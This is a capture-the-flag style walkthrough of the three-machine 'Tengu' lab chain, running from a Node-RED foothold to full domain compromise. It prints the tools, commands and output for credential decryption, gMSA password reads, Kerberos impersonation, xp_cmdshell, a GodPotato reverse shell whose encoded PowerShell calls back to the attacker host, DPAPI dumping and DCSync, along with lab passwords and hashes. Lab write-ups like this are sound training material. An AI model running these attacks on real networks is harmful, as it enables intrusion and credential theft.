# Tengu (Chain) ## Machine information

**Operating System:** Windows **Chain:** True (3 Machine) ## Credentials | Username | Password | Method | Scope | | ------------------ | ------------------- | ------------------------------- | ----------- | | nodered\_connector | DreamPuppyOverall25 | Decrypted from flows\_cred.json | MSSQL | | t2\_m.winters | Tengu123 | Extracted from database | Domain User | ✅ Valid Usernames ``` nodered_connector ``` 🔑 Passwords list ``` Tengu123 ``` ## Information Gathering ```sh 10.10.229.53 3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services #10.10.229.54 3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services #10.10.229.55 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0) 1880/tcp open vsat-control ``` ## Service Enumeration #### Discovering Node RED Node-RED is a visual programming tool, built on Node.js, that allows users to create applications that collect, transform, and visualize data. It enables users to connect hardware devices, APIs, and online services without writing any code. This makes it a valuable tool for rapid development in areas like the Internet of Things (IoT) and industrial control systems.

## Compromise nodered server ### Initial Enumeration The tester was able to compromise the server using the following work flow.

1. Inject block 2. Command Block 3. Debug block

### Lateral movement to t2\_m.winters #### Decrypting credentials During the enumeration the tester found the next article: [how-to-decrypt-flows\_cred-json-from-nodered-data](https://blog.hugopoi.net/en/2021/12/28/how-to-decrypt-flows_cred-json-from-nodered-data/) and was used to decrypt `flow_cred.json` file.

```sh nodered_svc@nodered:~/.node-red$ find / -name "flows_cred.json" 2>/dev/null /opt/nodered/.node-red/flows_cred.json /home/nodered_svc/.node-red/flows_cred.json ``` ``` ❯ ./decrypt.sh .node-red | xargs echo {d237b4c16a396b9e:{username:nodered_connector,password:DreamPuppyOverall25}} ``` #### Setting up a tunneling

#### Extracting User credentials into database Connecting to MSSQL using impacket toolkit ```sh ❯ proxychains impacket-mssqlclient sql.tengu.vl/nodered_connector:'DreamPuppyOverall25'@10.10.148.22 2>/dev/null ``` ```sh SQL (nodered_connector nodered_connector@Demo)> SELECT * FROM Demo.INFORMATION_SCHEMA.TABLES; TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE ------------- ------------ ---------- ---------- Demo dbo Users b'BASE TABLE' SQL (nodered_connector nodered_connector@Demo)> select * from Users; ID Username Password ---- --------------- ------------------------------------------------------------------- NULL b't2_m.winters' b'af9cfa9b70e5e90984203087e5a5219945a599abf31dd4bb2a11dc20678ea147' SQL (nodered_connector nodered_connector@Demo)> ``` ### Privilege Escalation to root ```sh nodered_svc@nodered:/opt/nodered$ su t2_m.winters@tengu.vl Password: t2_m.winters@tengu.vl@nodered:/opt/nodered$ sudo -l [sudo] password for t2_m.winters@tengu.vl: Matching Defaults entries for t2_m.winters@tengu.vl on nodered: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty User t2_m.winters@tengu.vl may run the following commands on nodered: (ALL : ALL) ALL t2_m.winters@tengu.vl@nodered:/opt/nodered$ sudo su root@nodered:/opt/nodered# ``` #### Extracting nodered NT Hash ```sh root@nodered:~# python3 keytabextract.py /etc/krb5.keytab [*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash. [*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction. [*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction. [+] Keytab File successfully imported. REALM : TENGU.VL SERVICE PRINCIPAL : NODERED$/ NTLM HASH : d4210ee2db0c03aa3611c9ef8a4dbf49 AES-256 HASH : 4ce11c580289227f38f8cc0225456224941d525d1e525c353ea1e1ec83138096 AES-128 HASH : 3e04b61b939f61018d2c27d4dc0b385f root@nodered:~# ``` ## Compromising SQL machine ### Initial Foothold

```sh #Using NetExec ❯ proxychains nxc ldap 10.10.148.21 -u 'NODERED$' -H d4210ee2db0c03aa3611c9ef8a4dbf49 --gmsa 2>/dev/null SMB 10.10.148.21 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False) LDAPS 10.10.148.21 636 DC [+] tengu.vl\NODERED$:d4210ee2db0c03aa3611c9ef8a4dbf49 LDAPS 10.10.148.21 636 DC [*] Getting GMSA Passwords LDAPS 10.10.148.21 636 DC Account: gMSA01$ NTLM: dc1d9dcba717b640f1d4ef66294b0790 LDAPS 10.10.148.21 636 DC Account: gMSA02$ NTLM: #Using bloodyAD ❯ proxychains bloodyAD --host dc.tengu.vl -d tengu.vl -u 'NODERED$' -p :d4210ee2db0c03aa3611c9ef8a4dbf49 get object 'gMSA01$' --attr msDS-ManagedPassword 2>/dev/null distinguishedName: CN=gMSA01,CN=Managed Service Accounts,DC=tengu,DC=vl msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:dc1d9dcba717b640f1d4ef66294b0790 msDS-ManagedPassword.B64ENCODED: Xa2PeJhpM9WJnpyqIoXMnx5z+2N57I+9lVX8fQA7o0KJUMPmFPGwLs1VGB++HezeVyyc6Eb5WVZOiZ0oCrRy5dlwmrF9lHlcV6nwZcABJhfBUsjBK8WL2/kxHoCC5SJXdykYPbmF+ESpaY68tYteAzqGgrDri4ghAjVIt35xZPKXfvxLtpkp8LbLsj9+siTwKeQ/7vjPOQZ76NJgN1oSAq4Kv6tNNVCaF2MoVTcBi/1djo/J9+b66g6uCg/WdsOQgEBNcJnX4yIU1qbh0EOhN6bpA6VXHW25/ppNkTnXiBteFKdOl+9bxUFcOIre8cFGHd/XtSZTa5GwUiO8kMcFcw== ``` #### Impersonating User account After compromising the `GMSA01$` account, the tester proceeded to enumerate the `Protected Users` group and discovered that both the `Administrator` and `TX_C.FOWLER` users belong to this group.

However, the user `T1_M.WINTERS` does not belong to the `Protected Users` group but is a member of the `SQL_ADMINS` group.

```sh ❯ proxychains impacket-getST -spn 'MSSQLSvc/sql.tengu.vl:1433' -impersonate 't1_M.WINTERS' -hashes :dc1d9dcba717b640f1d4ef66294b0790 'tengu.vl/gMSA01$' 2>/dev/null Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [-] CCache file is not found. Skipping... [*] Getting TGT for user [*] Impersonating t1_M.WINTERS [*] Requesting S4U2self [*] Requesting S4U2Proxy [*] Saving ticket in t1_M.WINTERS@MSSQLSvc_sql.tengu.vl:1433@TENGU.VL.ccache ❯ export KRB5CCNAME='t1_M.WINTERS@MSSQLSvc_sql.tengu.vl:1433@TENGU.VL.ccache' ``` #### Connecting and enable XP\_CMDShell ```sh ❯ proxychains impacket-mssqlclient -k -no-pass sql.tengu.vl SQL (TENGU\t1_m.winters dbo@master)> enable_xp_cmdshell INFO(SQL): Line 196: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install. INFO(SQL): Line 196: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install. ``` #### Gaining Shell into SQL.Tengu.vl using hoaxshell **Tool:** [hoaxshell](https://github.com/t3l3machus/hoaxshell)

### Privilege Escalation to NT Authority System #### Abusing SeImpersonatePrivilege The tester setting up a SMB Folder sharing [GodPotato-NET4.exe](https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe) and sent a reverse shell to gain access as NT Authority System. ```sh PS C:\Windows\system32 > \\10.8.5.48\smbfolder\GodPotato-NET4.exe -Cmd 'cmd /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADUALgA0ADgAIgAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAAPS C:\Windows\system32 > \\10.8.5.48\smbfolder\GodPotato-NET4.exe -Cmd 'cmd /c powershell -e ' ```

**Listing Stored Credentials** ``` PS C:\> cmdkey /list Currently stored credentials: Target: Domain:batch=TaskScheduler:Task:{3C0BC8C6-D88D-450C-803D-6A412D858CF2} Type: Domain Password User: TENGU\T0_c.fowler Local machine persistence PS C:\> ``` ## Compromising Tengu.vl Domain Controller #### Dumping DPAPI credentials . **Tool:** [SharpDPAPI.exe](https://github.com/jakobfriedl/precompiled-binaries/raw/main/Credentials/SharpDPAPI.exe) ```sh PS C:\Temp> .\SharpDPAPI.exe machinecredentials __ _ _ _ ___ (_ |_ _. ._ ._ | \ |_) /\ |_) | __) | | (_| | |_) |_/ | /--\ | _|_ | v1.11.3 Folder : C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials CredFile : 67B6C9FA0475C51A637428875C335AAD guidMasterKey : {1415bc56-749a-4f03-8a8e-9fb9733359ab} size : 576 flags : 0x20000000 (CRYPTPROTECT_SYSTEM) algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256) description : Local Credential Data LastWritten : 3/10/2024 2:49:34 PM TargetName : Domain:batch=TaskScheduler:Task:{3C0BC8C6-D88D-450C-803D-6A412D858CF2} TargetAlias : Comment : UserName : TENGU\T0_c.fowler Credential : UntrimmedDisplaceModify25 PS C:\Temp> ``` #### Bypassing Status account Restrinction The tester was able to bypass `STATUS_ACCOUNT_RESTRICTION` using Kerberos authentication. ```sh ❯ proxychains nxc smb 10.10.148.21 -u 'T0_c.fowler' -p 'UntrimmedDisplaceModify25' 2>/dev/null SMB 10.10.148.21 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False) SMB 10.10.148.21 445 DC [-] tengu.vl\T0_c.fowler:UntrimmedDisplaceModify25 STATUS_ACCOUNT_RESTRICTION ❯ proxychains nxc smb 10.10.148.21 -u 'T0_c.fowler' -p 'UntrimmedDisplaceModify25' -k 2>/dev/null SMB 10.10.148.21 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False) SMB 10.10.148.21 445 DC [+] tengu.vl\T0_c.fowler:UntrimmedDisplaceModify25 (Pwn3d!) ``` #### Requesting Ticket Granting ticket for Kerberos ```sh ❯ proxychains impacket-getTGT tengu.vl/'T0_c.fowler':'UntrimmedDisplaceModify25' -k 2>/dev/null Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Saving ticket in T0_c.fowler.ccache ❯ export KRB5CCNAME='T0_c.fowler.ccache' ``` #### Performing DCSync Attack using Kerberos ```sh ❯ proxychains impacket-secretsdump -k -no-pass dc.tengu.vl -just-dc-user Administrator 2>/dev/null Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:38c77bef855fd6896bc28c9429e18cfd::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:2962482a8268521e3a583150d79b51474b07a0d237216b7c15da26b4cb0d3807 Administrator:aes128-cts-hmac-sha1-96:360c06cc8bed5a43e08afe83c3797b2a Administrator:des-cbc-md5:3e5816ceea8feaa4 ``` #### Requesting a TGT as Administrator on DC.Tengu.vl ```sh ❯ proxychains impacket-getTGT tengu.vl/Administrator -hashes :38c77bef855fd6896bc28c9429e18cfd 2>/dev/null Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Saving ticket in Administrator.ccache ❯ export KRB5CCNAME='Administrator.ccache' ``` #### Gaining Shell as Administrator on DC.Tengu.vl ```sh ❯ proxychains impacket-wmiexec -k -no-pass dc.tengu.vl 2>/dev/null Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] SMBv3.0 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:\>whoami tengu\administrator C:\> ```